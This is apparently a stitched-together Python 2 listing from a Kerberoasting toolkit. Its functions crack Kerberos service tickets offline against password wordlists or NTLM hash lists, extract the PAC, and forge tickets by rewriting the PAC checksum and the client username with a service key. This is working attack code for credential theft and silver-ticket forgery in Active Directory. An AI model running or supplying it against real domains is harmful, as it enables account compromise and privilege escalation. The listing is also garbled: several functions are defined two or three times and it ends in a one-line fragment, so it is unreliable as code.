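def getpac(key, rawticket, debug=False, verbose=False):
    """Return the PAC bytes carried in the server ticket of a KRB-CRED.

    Args:
        key: service key used to decrypt the ticket's enc-part.
        rawticket: BER/DER-encoded KRB-CRED (the same structure updatepac
            consumes).
        debug: accepted for interface compatibility; not read here.
        verbose: print progress messages.

    Returns:
        The PAC as a byte string (Python 2 ``str``), taken from the first
        authorization-data element's AD-IF-RELEVANT payload.

    Raises:
        ValueError: if the structure cannot be decoded or the key does not
            decrypt the enc-part.
    """
    # attempt decoding of ticket
    try:
        ramticket, _extra = decoder.decode(rawticket)
        serverticket = ramticket.getComponentByPosition(2)
        # tickets[0].enc-part.cipher
        encserverticket = (serverticket.getComponentByPosition(0)
                           .getComponentByPosition(3)
                           .getComponentByPosition(2)
                           .asOctets())
    except Exception:
        # narrowed from a bare except so KeyboardInterrupt/SystemExit propagate
        raise ValueError('Unable to decode ticket. Invalid file.')
    if verbose:
        print('Ticket succesfully decoded')
    # 2 is presumably the Kerberos key-usage number for the ticket enc-part
    decserverticketraw, _nonce = kerberos.decrypt(key, 2, encserverticket)
    if decserverticketraw is None:
        raise ValueError('Unable to decrypt ticket. Invalid key.')
    if verbose:
        print('Decryption successful')
    decserverticket, _extra = decoder.decode(decserverticketraw)
    # Called with the ticket's own current values, so it only matters if
    # updatetimestampsserverticket has side effects beyond rewriting the
    # fields it is given; kept to preserve the original behaviour.
    updatetimestampsserverticket(decserverticket,
                                 str(decserverticket[5]),
                                 str(decserverticket[6]),
                                 str(decserverticket[7]),
                                 str(decserverticket[8]))
    # authorization-data[0].ad-data holds the AD-IF-RELEVANT container
    adifrelevant, _extra = decoder.decode(decserverticket[9][0][1])
    pac = str(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
    return pac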
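def crackTicket(ticket, label, hashList):
    """Test each NTLM hash in *hashList* against one base64-encoded ticket.

    Args:
        ticket: base64 text of either a DER KRB-CRED (first byte 0x76, the
            [APPLICATION 22] tag) or newline-separated hex-encoded TGS-REP
            structures (decoded text starting with "6d").
        label: account name used in the printed output and FAIL markers.
        hashList: iterable of hex-encoded NTLM hashes.

    Returns:
        "FAIL<label>" when the input cannot be parsed (with a trailing
        newline only for the base64 failure, as in the original), otherwise
        "". Matches are printed, not returned.

    Note:
        Relies on Python 2 byte-string semantics (``data[0] == '\\x76'``,
        ``str.decode('hex')``).
    """
    try:
        data = base64.b64decode(ticket)
    except Exception:
        return "FAIL" + str(label) + "\n"
    # Plain local list: nothing here is shared across processes, so the
    # multiprocessing Manager (and the helper process it spawned) is not needed.
    enctickets = []
    if data[0] == '\x76':
        # DER KRB-CRED: tickets[0].enc-part.cipher
        try:
            enctickets.append(str(decoder.decode(data)[0][2][0][3][2]))
        except Exception:
            return "FAIL" + str(label)
    elif data[:2] == '6d':
        # one hex-encoded TGS-REP per line: ticket.enc-part.cipher
        # (loop variable renamed so it no longer shadows the `ticket` argument)
        for line in data.strip().split('\n'):
            try:
                enctickets.append(str(decoder.decode(line.decode('hex'))[0][4][3][2]))
            except Exception:
                return "FAIL" + str(label)
    if not enctickets:
        # neither format matched; the original raised IndexError on enctickets[0]
        return "FAIL" + str(label)
    print("\nAccount: " + label)
    for currentHash in hashList:
        ntlmHash_hex = binascii.unhexlify(currentHash)
        # only the first extracted cipher is tested, as in the original
        kdata, _nonce = kerberos.decrypt(ntlmHash_hex, 2, enctickets[0])
        if kdata:
            print("NTLM Hash: " + currentHash)
            break
    return ""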
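def _cipherblobs(data):
    """Extract the enc-part cipher bytes from decoded ticket *data*.

    Returns a list of cipher byte strings (empty when neither known layout
    matches), or None when a structure cannot be decoded. Python 2
    byte-string semantics are assumed (``data[0] == '\\x76'``,
    ``str.decode('hex')``).
    """
    blobs = []
    try:
        if data[0] == '\x76':
            # DER KRB-CRED ([APPLICATION 22]): tickets[0].enc-part.cipher
            blobs.append(str(decoder.decode(data)[0][2][0][3][2]))
        elif data[:2] == '6d':
            # one hex-encoded TGS-REP per line: ticket.enc-part.cipher
            for line in data.strip().split('\n'):
                blobs.append(str(decoder.decode(line.decode('hex'))[0][4][3][2]))
    except Exception:
        return None
    return blobs


def crackTicket(ticket, label, hashList):
    """Test each NTLM hash in *hashList* against one base64-encoded ticket.

    NOTE(review): this listing defines crackTicket twice; at import time the
    later definition replaces the earlier one, so the two should be merged.

    Args:
        ticket: base64 text of a DER KRB-CRED or of newline-separated
            hex-encoded TGS-REP structures.
        label: account name used in the printed output and FAIL markers.
        hashList: iterable of hex-encoded NTLM hashes.

    Returns:
        "FAIL<label>" when the input cannot be parsed (trailing newline only
        for the base64 failure, as in the original), otherwise "". Matches
        are printed, not returned.
    """
    try:
        data = base64.b64decode(ticket)
    except Exception:
        return "FAIL" + str(label) + "\n"
    # a plain list replaces the multiprocessing Manager list: nothing is shared
    enctickets = _cipherblobs(data)
    if not enctickets:
        # decode failure, or neither format matched (originally an IndexError)
        return "FAIL" + str(label)
    print("\nAccount: " + label)
    for currentHash in hashList:
        # only the first extracted cipher is tested, as in the original
        kdata, _nonce = kerberos.decrypt(binascii.unhexlify(currentHash), 2, enctickets[0])
        if kdata:
            print("NTLM Hash: " + currentHash)
            break
    return ""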
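def crack(wordlist, enctickets):
    """Consume words from *wordlist* and try each against the remaining tickets.

    Args:
        wordlist: queue-like object with ``get()``; the literal
            'ENDOFQUEUEENDOFQUEUEENDOFQUEUE' marks the end of input.
        enctickets: list of (cipher, index, filename) tuples; entries whose
            key is found are removed in place.

    Returns:
        None. Matches are printed. Returns early when a removal fails or no
        tickets remain; breaks out of the loop on the end marker.
    """
    toremove = []
    while enctickets:
        try:
            word = wordlist.get()
            if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
                break
            # round-trip through utf-8-sig strips a BOM carried over from the file
            print("\ntrying %s" % word.encode('utf-8').decode('utf-8-sig').strip())
            for et in enctickets:
                kdata, _nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
                if kdata:
                    print('found password for ticket %i: %s File: %s' % (et[1], word, et[2]))
                    toremove.append(et)
            for et in toremove:
                try:
                    enctickets.remove(et)
                except Exception:
                    return
            if not enctickets:
                return
        except Exception:
            # The original used a bare except here, which also swallowed
            # KeyboardInterrupt/SystemExit; ordinary errors from get()/decrypt
            # are still skipped as before.
            continue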
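def updatepac(key, rawticket, pac, debug=False, verbose=False):
    """Replace the PAC inside a KRB-CRED's server ticket and re-encrypt it.

    Args:
        key: service key; used to decrypt the enc-part, to compute the
            rewritten PAC checksum, and to re-encrypt.
        rawticket: BER/DER-encoded KRB-CRED, as consumed by getpac.
        pac: replacement PAC bytes, in the layout getpac returns.
        debug: accepted for interface compatibility; not read here.
        verbose: print progress messages.

    Returns:
        The DER-encoded KRB-CRED containing the modified ticket.

    Raises:
        ValueError: if the structure cannot be decoded or the key does not
            decrypt the enc-part.
    """
    # attempt decoding of ticket
    try:
        ramticket, _extra = decoder.decode(rawticket)
        serverticket = ramticket.getComponentByPosition(2)
        # tickets[0].enc-part.cipher
        encserverticket = (serverticket.getComponentByPosition(0)
                           .getComponentByPosition(3)
                           .getComponentByPosition(2)
                           .asOctets())
    except Exception:
        # narrowed from a bare except so KeyboardInterrupt/SystemExit propagate
        raise ValueError('Unable to decode ticket. Invalid file.')
    if verbose:
        print('Ticket succesfully decoded')
    # the nonce is kept: it is passed back to kerberos.encrypt below
    decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
    if decserverticketraw is None:
        raise ValueError('Unable to decrypt ticket. Invalid key.')
    if verbose:
        print('Decryption successful')
    decserverticket, _extra = decoder.decode(decserverticketraw)
    # change the validity times in the server ticket (called with the
    # ticket's own current values, as in the original)
    updatetimestampsserverticket(decserverticket,
                                 str(decserverticket[5]),
                                 str(decserverticket[6]),
                                 str(decserverticket[7]),
                                 str(decserverticket[8]))
    adifrelevant, _extra = decoder.decode(decserverticket[9][0][1])
    # '\x11\x00\x00\x00' looks like a little-endian key-usage value (17);
    # confirm against kerberos.chksum's expected argument
    chksum = kerberos.chksum(key, '\x11\x00\x00\x00', pac)
    # repair server checksum: only the 16 bytes at pac[-44:-28] are replaced,
    # which assumes chksum is 16 bytes long and that the PAC ends with the
    # signature buffers in that fixed layout; pac[-28:] is left untouched
    newpac = pac[:-44] + chksum + pac[-28:]
    # rebuild AD-IF-RELEVANT by writing the decoder objects' private _value
    # (presumably pyasn1); this depends on the library version in use
    adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
    decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)
    # put the ticket back together again
    newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
    ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
    return encoder.encode(ramticket)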
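def crack(wordlist, enctickets):
    """Try each word taken from *wordlist* against every remaining ticket.

    Args:
        wordlist: queue-like object with ``get()``. This variant has no end
            marker, so nothing here stops the loop when the queue is
            exhausted — ``get()`` is expected to block or raise (confirm
            against the caller).
        enctickets: list of (cipher, index, filename) tuples; entries whose
            key is found are removed in place.

    Returns:
        None. Matches are printed. Returns early when a removal fails or
        when no tickets remain.
    """
    toremove = []
    while enctickets:
        word = wordlist.get()
        for et in enctickets:
            kdata, _nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
            if kdata:
                print('found password for ticket %i: %s File: %s' % (et[1], word, et[2]))
                toremove.append(et)
        for et in toremove:
            try:
                enctickets.remove(et)
            except Exception:
                # narrowed from a bare except so KeyboardInterrupt is not swallowed
                return
        if not enctickets:
            return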
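def crack(wordlist, enctickets):
    """Try each word taken from *wordlist* against every remaining ticket.

    Args:
        wordlist: queue-like object with ``get()``; the literal
            'ENDOFQUEUEENDOFQUEUEENDOFQUEUE' marks the end of input.
        enctickets: list of (cipher, index, filename) tuples; entries whose
            key is found are removed in place.

    Returns:
        None. Matches are printed. Returns early when a removal fails or
        when no tickets remain; breaks out of the loop on the end marker.
    """
    toremove = []
    while enctickets:
        word = wordlist.get()
        if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
            break
        for et in enctickets:
            kdata, _nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
            if kdata:
                print('found password for ticket %i: %s File: %s' % (et[1], word, et[2]))
                toremove.append(et)
        for et in toremove:
            try:
                enctickets.remove(et)
            except Exception:
                # narrowed from a bare except so KeyboardInterrupt is not swallowed
                return
        if not enctickets:
            return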
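def updateusernameinencpart(key, rawticket, username, debug=False, verbose=False):
    """Rewrite the client name inside a KRB-CRED server ticket's enc-part.

    Args:
        key: service key used to decrypt and re-encrypt the enc-part.
        rawticket: BER/DER-encoded KRB-CRED, as consumed by getpac/updatepac.
        username: value written into component [3][1][0] of the decrypted
            EncTicketPart (presumably cname.name-string[0]).
        debug: accepted for interface compatibility; not read here.
        verbose: print a progress message after decoding.

    Returns:
        The modified KRB-CRED as a decoded object — not DER bytes, unlike
        updatepac, which returns encoder.encode(...). Callers may depend on
        this, so the return type is unchanged.

    Raises:
        ValueError: if the structure cannot be decoded or the key does not
            decrypt the enc-part.
    """
    try:
        ramticket, _extra = decoder.decode(rawticket)
        serverticket = ramticket.getComponentByPosition(2)
        # tickets[0].enc-part.cipher
        encserverticket = (serverticket.getComponentByPosition(0)
                           .getComponentByPosition(3)
                           .getComponentByPosition(2)
                           .asOctets())
    except Exception:
        # narrowed from a bare except so KeyboardInterrupt/SystemExit propagate
        raise ValueError('Unable to decode ticket. Invalid file.')
    if verbose:
        print('Ticket succesfully decoded')
    decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
    # Same check as getpac/updatepac; the original passed None straight into
    # decoder.decode on a wrong key and failed with an unrelated error.
    if decserverticketraw is None:
        raise ValueError('Unable to decrypt ticket. Invalid key.')
    encpart = decoder.decode(decserverticketraw)[0]
    # writes the decoder object's private _value directly (presumably pyasn1)
    encpart[3][1][0]._value = username
    # re-encrypt with the nonce recovered from decryption
    newencserverticket = kerberos.encrypt(key, 2, encoder.encode(encpart), nonce)
    ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
    return ramticket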
((decoder.decode(data)[0][2][0][3][2]).asOctets(), i, f)) i += 1 elif data[:2] == '6d': for ticket in data.strip().split('\n'): enctickets.append(((decoder.decode( ticket.decode('hex'))[0][4][3][2]).asOctets(), i, f)) i += 1 if len(enctickets): print("Cracking %i tickets..." % len(enctickets)) else: print("No tickets found") sys.exit() # load wordlist for w in args.wordlistfile: word = w.decode('utf-8').strip() hash = kerberos.ntlmhash(word) for et in enctickets: kdata, nonce = kerberos.decrypt(hash, 2, et[0]) if kdata: print('found password for ticket %i: %s File: %s' % (et[1], word, et[2])) enctickets.remove(et) if len(enctickets) == 0: print('Successfully cracked all tickets') sys.exit() if len(enctickets): print("Unable to crack %i tickets" % len(enctickets))